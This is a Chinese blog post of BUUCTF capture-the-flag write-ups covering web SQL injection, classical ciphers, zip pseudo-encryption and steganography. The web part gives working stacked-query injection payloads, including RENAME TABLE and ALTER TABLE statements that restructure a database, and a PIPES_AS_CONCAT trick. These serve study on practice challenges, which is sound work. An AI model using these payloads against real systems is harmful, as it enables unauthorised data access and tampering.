每周刷题(二)

最新推荐文章于 2023-06-30 12:32:23 发布
最新推荐文章于 2023-06-30 12:32:23 发布
阅读量464 收藏
点赞数
分类专栏: 刷题 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45869039/article/details/108740083
版权

题目来源:BUUCTF

目录

web 1[强网杯 2019]随便注

在这里插入图片描述
先判断是否有注入点,试一下1'

在这里插入图片描述
注入点找到了

然后判断出列数
在这里插入图片描述
222222

再用1' union select 1,database(); #出现了报错
在这里插入图片描述
select等字符被过滤了,正常注入不能用,报错注入也不行!

看了下大师傅的WP尝试用堆叠注入。

我们先构造payload:1' ;show database; #
在这里插入图片描述
再次构造payload1' ;show tables; #查看有几个表
在这里插入图片描述
只有两个表
从两个表里,我们再查询列
构造payload:0'; show columns from words ;#
在这里插入图片描述
再构造payload:

0';show columns from `1919810931114514`;#

先前忘了给字符加单引号,试了n次也没成功!到最后加字符才知道自己的无知太可怕,浪费了很多时间!!!

在这里插入图片描述

找到了flag的的列,下一步就是如何让他回显出来

上图,我们知道正则匹配过滤了很多字符,但是没有过滤alertrename,这就可以来波骚姿势了

①先把words表改为word1

②再利用rename将1919810931114514这个表修改为word

③再将flag字段修改成id

构造payload:

0';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

在这里插入图片描述
emmmmm,用1';show tables;#
在这里插入图片描述

修改成功了

访问0' or '1'='1

在这里插入图片描述
得到flag

这波有点小细节浪费了点时间。这道题对于我来说新知识太多了,待好好消化。

web 2 EasySQL

在这里插入图片描述

刚刚学会堆叠注入,这又来了一道

先构造payload:1 ;show databases ;
在这里插入图片描述

得到数据库

再看表1 ;show tables;
在这里插入图片描述
有个flag表

show columns from Flag???

不行的

看大师傅wp神之payload,根据报错写出了查询语句select $_GET['query'] || flag from flag

||意思是或,前面的语句为真,后面的语句便不再执行。

第一种思路

payload:*,1

那为什么payload能得到flag了

sql=select.post[‘query’]."||flag from Flag";
如果$post[‘query’]的数据为*,1,sql语句就变成了select *,1||flag from Flag,
就是select *,1 from Flag,这样就直接查询出了Flag表中的所有内容。

第二种思路

就是把||作为拼接符,再Oracle是支持的,但在MySQL里需要更改sql-mode

然后构造payload:1;set sql_mode=PIPES_AS_CONCAT;select 1

在这里插入图片描述

web题是真的难啊
!!!

Cyrto 1信息化时代的步伐

这是伟人说的一句话

打开附件得到606046152623600817831216121621196386

这种加密方式是:中文电码

在这里插入图片描述
哈哈哈哈哈,笑死我了

Cypto 2 凯撒?替换?呵呵!

拿到一串字符:MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO}

我以为是变异凯撒,但找了n遍也没有找到规律。

看大师傅 wp,用了暴力破解

在这里插入图片描述
直接solve

在这里插入图片描述
第一个flag转小写,切记去掉所有空格,要不然会出错

Cypto 3 old-fashion

得到一串字符

Os drnuzearyuwn, y jtkjzoztzoes douwlr oj y ilzwex eq lsdexosa kn pwodw tsozj eq ufyoszlbz yrl rlufydlx pozw douwlrzlbz, ydderxosa ze y rlatfyr jnjzli; mjy gfbmw vla xy wbfnsy symmyew (mjy vrwm qrvvrf), hlbew rd symmyew, mebhsymw rd symmyew, vbomgeyw rd mjy lxrzy, lfk wr dremj. Mjy eyqybzye kyqbhjyew mjy myom xa hyedrevbfn lf bfzyewy wgxwmbmgmbrf. Wr mjy dsln bw f1_2jyf-k3_jg1-vb-vl_l

没得感觉,按照上题就试了暴力破解

这句话总感觉怪怪的

Wr mjy dsln bw f1_2jyf-k3_jg1-vb-vl_l

在这里插入图片描述
hhhhh

Misc 1 zip伪加密

伪加密,我解决方法有两种

使用工具

在这里插入图片描述
直接破解

第二种,拉进winhex

在这里插入图片描述
原本的00 00改为09 00就会提示有密码了,换为00 00伪加密就没了

Misc 2 ningen

得到一张图片

在这里插入图片描述
试着用Binwalk分析

分离出一个zip压缩包

但是有密码,直接去爆破

在这里插入图片描述
得到flag

Misc 3 镜子里面的世界

在这里插入图片描述

文件名字就带有steg,我们直接就用隐写工具,仔细看几遍

red 0,green 0,blue 0最上方都有一串东西

我们data extract找到这三个通道

在这里插入图片描述

最后一行,就是flag了,以文本形式保存下来

小小奇点呀!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-01-18
m0_53548344的博客
01-18 336
BUUCTF密码25到27题 25:凯撒?替换?呵呵! 看题目: 中间是一行字符串: MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO} 先试试凯撒解密,得不到有用的结果 猜测应该是与凯撒相同形式的替换字符, 不过有很多种结果, 这里可以用工具:quipqiup.com 这里直接给出了小写形式,flag 26:old-fashion 1 看题目: 打开附件: 看着也没什么头绪,就是最后十几个字符有点特别,先用凯撒转一下
BUUCTF密码题一
一颗小白菜的博客
02-24 429
给了四个数据,怎么和常规的RSA不一样,dp,dq是啥?结束语:路漫漫其修远兮,多做题,多学习,才能慢慢进步!再凯撒,密钥为5的时候,得到SHUANGYU。大佬真强,我还是太菜。
buuctf 凯撒?替换?呵呵!
shshss64的博客
09-22 3263
凯撒?
凯撒?替换?呵呵!
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-10 315
buuctf凯撒?替换?呵呵!题解
BUUCTF——凯撒 替换 呵呵
qq_70288605的博客
06-30 352
题中给了这样一串密文MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO}根据这个密文我们知道MTHJ一定是对应FLAG。可以看出第一行就是我们要求出的明文。
leetcode:算法刷题
05-23
《LeetCode:JavaScript算法刷题指南》 在编程领域,LeetCode是一个广为人知的在线平台,它提供了大量的编程挑战,旨在帮助开发者提升算法技能、解决问题的能力以及对数据结构和算法的理解。对于想要深入学习...
LeetCode:leetcode刷题记录
03-27
在这个“LeetCode刷题记录”中,我们可以看到两个具体的题目,即“84.柱状图中最大矩形”和“重新排列后的最大子矩阵(第224周每周竞赛T3)”。这两个题目涉及到的数据结构和算法知识是十分重要的,下面将分别对它们...
程序员考试刷题-SESE:自己
07-07
程序员考试刷题软件工程专业英语(SESE) 北京交通大学软件学院学生课程。 课程结构 课程分为8个单元,对应8天的课程。 对于每个单元,有 4 个部分: 阅读理解 提前提供了软件领域的文章。 在课堂上,讲师会讲解文章...
如何正确刷题?.doc
12-13
这意味着要控制每天和每周的做题数量,避免陷入题海战术。在开始做题前,应该对题目进行筛选,挑出那些你已经熟悉或者多次遇到的普通题目,重点放在不熟练或陌生的题目上。这样做可以确保你的精力集中在需要提升的...
leetcode下载-leetcode:刷题
06-29
每周一题/每周看一篇英文 22周 2020/05/26 两数之和: 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。 你可以假设每种输入只会对应一个答案。...
[BUUCTF]凯撒?替换?呵呵!解析
rang的博客
11-04 4021
打开题目发现提供的有MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO} 以为是简单的凯撒解密,但是分析Ascill表,发现毫无规律,意味着要爆破出所有可能 在线工具:https://quipqiup.com/ 去空格转小写 flag{substitutioncipherdecryptionisalwayseasyjustlikeapieceofcake} ...
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1587
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
CTF-SQL注入
weixin_44770698的博客
06-16 5080
CTF-SQL注入题目整理
BUU的SUCTF 2019 Easysql
小白渣的博客
02-05 3479
呜呜呜~~ ~自己已经好久好久都没有做题和更新博客辽 加上这次的疫情,感jio整个人都要躺发霉辽!!! 下午闲着没事终于开始了做题 打开题目发现是这样的一个页面 第一步还是老样子 先看看源码是什么样子的 应该是发现不了什么东西 我们发现是post 方法传参 我们可以发现 1;show databases; #查库 1;show tables; #查表 可以发现只有一个Flag...
ctf php sql注入,CTF WEB SQL注入 writeups
weixin_35076990的博客
03-17 464
尝试了字符型、数字型注入,无果。使用burpsuite 进行爆破。使用 simple list 中的 sql 注入清单进行测试。intruder用法手工测试发现输入数字后都会出现(有wp说这种输出都是 var_dump() 函数输出的结果)。发现过滤了很多关键字,类似 delete、update等。结果出现 Too long,Nonono 、或者什么都没有显示。输入数字 1 时候的回显:Array...
CTF [SUCTF 2019]EasySQL writeup 堆叠注入 | || *的使用
baynk的博客
04-01 2495
专挑注入的题先做。。。 0x01 干干干 给flag, 然后又试了',",-1等查找注入点的参数,发现存在整形注入,出现Nonono.都是被检测出来有过滤,于是去fuzz了下。 这些都是被过滤的,于是发现有个|和||没有被过滤,可以搞盲注,但是or被过滤了,information也连带着用不了,这玩意用不了常规的注入好像也没用,报错信息也关了,报错注入也用不了。于是又看前端的输出感觉像堆叠注...
【BUUCTF】Web题解
xuanyulevel6的博客
08-08 5251
【BUUCTF】Web题解
CTF-SQL注入的姿势
qq_41996851的博客
04-21 651
系统学习SQL注入 常用函数: 函数名称 函数功能 函数使用说明 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version()/@@version 数据库版本 @@datadir 数据库路径 @@basedir 数据库安装路径 @@version_compile_os 操作系统 count() 返
BUUCTF 凯撒?替换?呵呵!
MikeCoke的博客
05-13 1685
直接爆破爆破工具 得到flag
leecode刷题手册
最新发布
07-15
对于LeetCode刷题,我可以提供一些指导和建议。LeetCode是一个非常受欢迎的在线编程平台,提供了大量的编程题目,涵盖各种算法和数据结构的知识点。 要有效地刷LeetCode题目,以下是一些建议: 1. 熟悉常见的数据结构和算法:在开始刷题之前,你需要对常见的数据结构(如数组、链表、栈、队列、树等)和算法(如排序、查找、递归、动态规划等)有一定的了解。 2. 刷题顺序:可以按照题目的难度或者类型进行刷题。刚开始可以选择一些简单的题目,逐渐提升到中等和困难难度的题目。另外,可以按照题目类型进行分类刷题,比如数组、链表、树等。 3. 题目分析:在开始解题之前,仔细阅读题目,并理解问题的要求。可以考虑一些边界情况和特殊情况。 4. 设计合适的解决方案:根据题目要求,设计出符合要求的解决方案。可以先在纸上画图或者写伪代码,再实现代码。 5. 编写高质量的代码:编写代码时,注意代码的可读性、可维护性和效率。可以考虑使用适当的数据结构和算法来优化代码。 6. 调试和测试:编写完代码后,进行调试和测试,确保代码能够正确地解决问题。 7. 多解法比较:对于一道题目,可以尝试不同的解法,比较它们的优劣,并分析其时间复杂度和空间复杂度。 8. 学习他人的解法:在刷题过程中,可以参考他人的解题思路和代码,并学习其中的优秀之处。 9. 刷题计划:可以制定一个刷题计划,每天或每周刷一定数量的题目,并坚持下去。 10. 总结和复习:在刷题过程中,及时总结自己的思考和解题过程,对于一些常见的算法和技巧进行复习和加深理解。 希望以上的建议对你有所帮助。祝你在LeetCode刷题中取得好成绩!如果你有其他问题,也欢迎继续提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值